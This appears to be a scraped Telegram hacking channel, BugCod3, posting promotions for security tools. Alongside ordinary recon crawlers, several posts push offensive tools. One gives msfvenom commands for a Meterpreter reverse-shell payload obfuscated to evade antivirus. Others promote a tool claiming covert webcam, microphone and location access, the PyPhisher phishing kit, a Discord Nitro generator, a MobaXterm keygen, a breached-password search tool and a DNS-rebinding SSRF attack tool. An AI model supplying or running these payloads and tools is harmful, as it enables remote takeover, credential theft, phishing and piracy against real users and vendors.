BugCod3
7.26K subscribers
334 photos
6 videos
7 files
443 links
[ BugCod3 ] β€” From Shadows To Shells ⚑️

πŸ•Ά Hacking | 🐞 Bug Bounty | πŸ” Security Tools
βš”οΈ Learn β€’ Hunt β€’ Dominate

πŸ‘₯ Group: T.me/BugCod3GP
πŸ“‚ Topic: T.me/BugCod3Topic

🌐 Web: BugCod3.com
πŸ€– Contact: T.me/BugCod3BOT
πŸ“§ Email: BugCod3@protonmail.com
Download Telegram
A Tool With Attractive Capabilities.

Features:

βšͺ️ Obtain Device Information Without Any Permission !
βšͺ️ Access Location [SMARTPHONES]
βšͺ️ Access Webcam
βšͺ️ Access Microphone

GitHub

#Python #social_engineering_attacks #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
⚑2
Python Obfuscator for FUD Python Code.

Example: Creating FUD Meterpreter
Python Payload

1. Generate
Python Payload:
msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt

2. Obfuscate Payload
onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfuscated_payload.txt

GitHub

#Python #bypass_antivirus #FUD #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
🌟 Discord Nitro Generator and Checker 🌟

A discord nitro generator and checker for all your nitro needs

It generates and checks discord nitro codes at the same time for maximum efficiency

πŸ“ Getting Started
To get a local copy up and running follow these simple steps.

βž• Prerequisites
You need to install Python, that can be done here

⬇️ Download OR Clone the repo github

◀️ Install Python packages
➜ ~ python3.8 -m pip install -r requirements.txt

➑️ Usage
Run the main.py file using py -3 main.py The code will show you two prompts:

1. How many codes to generate
2. If you want to use a discord webhook, if you dont know how to get a discord webhook url it is located at
channel settings Β» intergrations Β» webhooks Β» create webhook
If you dont want to use a webhook simply leave this blank

The code will start generating and checking after that step

😸 Github

⚠️ This program has not been tested by our team ⚠️

#Python #Generator #Checker #Discord #Nitro
βž—βž—βž—βž—βž—βž—βž—βž—βž—βž—βž—βž—
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
❀‍πŸ”₯4
🌟 Photon 🌟

Incredibly fast crawler designed for OSINT

Photon can extract the following data while crawling:
βšͺ️URLs (in-scope & out-of-scope)
βšͺ️URLs with parameters (example.com/gallery.php?id=2)
βšͺ️Intel (emails, social media accounts, amazon buckets etc.)
βšͺ️Files (pdf, png, xml etc.)
βšͺ️Secret keys (auth/API keys & hashes)
βšͺ️JavaScript files & Endpoints present in them
βšͺ️Strings matching custom regex pattern
βšͺ️Subdomains & DNS related data


⬇️ Download
😸 Github

#Python #Crawler #Osint #Spider
βž—βž—βž—βž—βž—βž—βž—βž—βž—βž—βž—βž—
πŸ‘€ T.me/MRvirusIRBOT
πŸ“’ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘2😱2❀1
πŸ₯· PyPhisher πŸ₯·

β–Ά A video of the pyphisher tool in action

πŸ’¬
Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others.

⬇️ Download
πŸ‘β€πŸ—¨ Previous Post

#Python #PyPhisher
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
3⚑1❀1🀩1
πŸ«₯ MobaXterm Keygen πŸ”˜

⚠️ Please see source code. It is not complex. ⚠️

I don't know how to make custom settings take effect in Customizer mode directly.

πŸ’¬
The only way I found is that you should export custom settings to a file named MobaXterm customization.custom which is also a zip file. Then merge two zip file: Custom.mxtpro and MobaXterm customization.custom to Custom.mxtpro. Finally copy newly-generated Custom.mxtpro to MobaXterm's installation path.

πŸ“Š Postscript:
βšͺ️ This application does not have complex activation algorithm and it is truly fantastic. So please pay for it if possible.

βšͺ️ The file generated, Custom.mxtpro, is actually a zip file and contains a text file, Pro.key, where there is a key string.

βšͺ️ MobaXterm.exe has another mode. You can see it by adding a parameter "-customizer".
./MobaXterm.exe -customizer


πŸ’» Usage:
./MobaXterm-Keygen.py "DoubleSine" 10.9


😸 Github

⬇️ Donwload
πŸ”’ BugCod3

#Python #MobaXterm #Keygen #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
6⚑1❀1
☠️ xnLinkFinder v4.4 ☠️

πŸ’¬
A python tool used to discover endpoints, potential parameters, and a target specific wordlist for a given target

πŸ“Š This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
βšͺ️ crawling a target (pass a domain/URL)
βšͺ️ crawling multiple targets (pass a file of domains/URLs)
βšͺ️ searching files in a given directory (pass a directory name)
βšͺ️ get them from a Burp project (pass location of a Burp XML file)
βšͺ️ get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)
βšͺ️ get them from a Caido project (pass location of a Caido export CSV file)
βšͺ️ processing a waymore results directory (searching archived response files from waymore -mode R and also requesting URLs from waymore.txt and the original URLs from index.txt - see waymore README.md)

πŸ”Ό Installation:
cd xnLinkFinder
sudo python setup.py install


πŸ’» Usage:
python xnLinkFinder.py --help


πŸ“‚ Examples:
#specific target
python3 xnLinkFinder.py -i target.com -sf target.com

#list of URLs
python3 xnLinkFinder.py -i target_js.txt -sf target.com


😸 Github

⬇️ Donwload
πŸ”’ BugCod3

#Python #Discover #Endpoints
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘3⚑2πŸ”₯2❀1
NetProbe: Network Probe

πŸ’¬
NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

πŸ“Š Features:
βšͺ️ Scan for devices on a specified IP address or subnet
βšͺ️ Display the IP address, MAC address, manufacturer, and device model of discovered devices
βšͺ️ Live tracking of devices (optional)
βšͺ️ Save scan results to a file (optional)
βšͺ️ Filter by manufacturer (e.g., 'Apple') (optional)
βšͺ️ Filter by IP range (e.g., '192.168.1.0/24') (optional)
βšͺ️ Scan rate in seconds (default: 5) (optional)

πŸ”Ό Installation:
cd NetProbe
pip install -r requirements.txt


πŸ’» Usage:
python3 netprobe.py β€”help


πŸ“‚ Example:
python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Network #Scanner #Vulnerability #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑4❀3πŸ”₯1
10000 h1 disclosed reports

πŸ’¬
On 31st Dec 2023, I made it my goal to read 10,000 H1 Reports in 2024 Q1 (i.e. first 3 months) to really understand deep down what kind of bugs are being reported, accepted, or rejected and how exactly I should approach my journey in #bugbounty. Also, I thought, there was no better resource than actual disclosed bug reports. Later I decided to cap my goal at *5000* because I think I nailed the common pattern and already accomplished what I wanted to get out of it.

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #H1 #Report
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
⚑3❀2πŸ”₯1πŸ’―1
πŸ’€ LeakSearch πŸ’€

πŸ’¬
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.

Requirements:
βšͺ️ Python 3
βšͺ️ Install requirements pip install -r requirements.txt

πŸ’» Usage:
LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Search #Parse #Password
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯3❀2⚑1πŸ‘1πŸ’―1
java2S3 Amazon S3 Bucket Enumeration Tool

Introduction:
This Python script automates the enumaration of S3 Buckets referenced in a subdomain's javascript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.

Features:
βšͺ️ Fetches HTTP status codes for subdomains
βšͺ️ Retrieves JavaScript URLs associated with each subdomain
βšͺ️ Identifies Amazon S3 buckets in the content

Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
pip install requests


Usage:
Create a text file (input.txt) containing a list of subdomains (one per line).

python js2s3.py input.txt example.com output.txt


Github

⬇️ Download
πŸ”“ BugCod3

#Python #Amazon #S3 #Buckets
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
⚑2❀1πŸ”₯1
httprebind

Automatic tool for DNS rebinding-based SSRF attacks

Installation:
sudo pip install dnslib flask flask_cors


Usage:
sudo python httprebind.py domain.name serverIp mode


Where mode is one of: ec2, ecs, gcloud

Make sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.

Github

⬇️ Download
πŸ”“ BugCod3

#Python #DNS #SSRF #Attack
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
⚑1❀1πŸ”₯1
Form Finder

This script can be used to find HTML forms in the list of endpoints/URLs.

Usage:
python3 formfinder.py endpoints.txt


😸 Github

⬇️ Donwload
πŸ”’ BugCod3

#Python #Form #Finder
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
β›“ T.me/BugCod3Topic
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯3⚑2❀1πŸ‘1
πŸ’œ knoxnl πŸ’œ

πŸ’¬
This is a python wrapper around the amazing KNOXSS API by Brute Logic. To use this tool (and the underlying API), you must have a valid KNOXSS API key. Don't have one? Go visit https://knoxss.me and subscribe! This was inspired by the "knoxssme" tool by @edoardottt2, but developed to allow for greater options.

πŸ”Ό Installation:
NOTE: If you already have a `config.yml` file, it will not be overwritten. The file `config.yml.NEW` will be created in the same directory. If you need the new config, remove `config.yml` and rename `config.yml.NEW` back to `config.yml`.

pip install knoxnl


πŸ’» Examples:
knoxnl -i "https://brutelogic.com.br/xss.php"

Or a file of URLs:
knoxnl -i ~/urls.txt


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Scanner #XSS #Knoxnl
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ‘€ T.me/BugCod3BOT
πŸ“£ T.me/BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯3⚑2❀1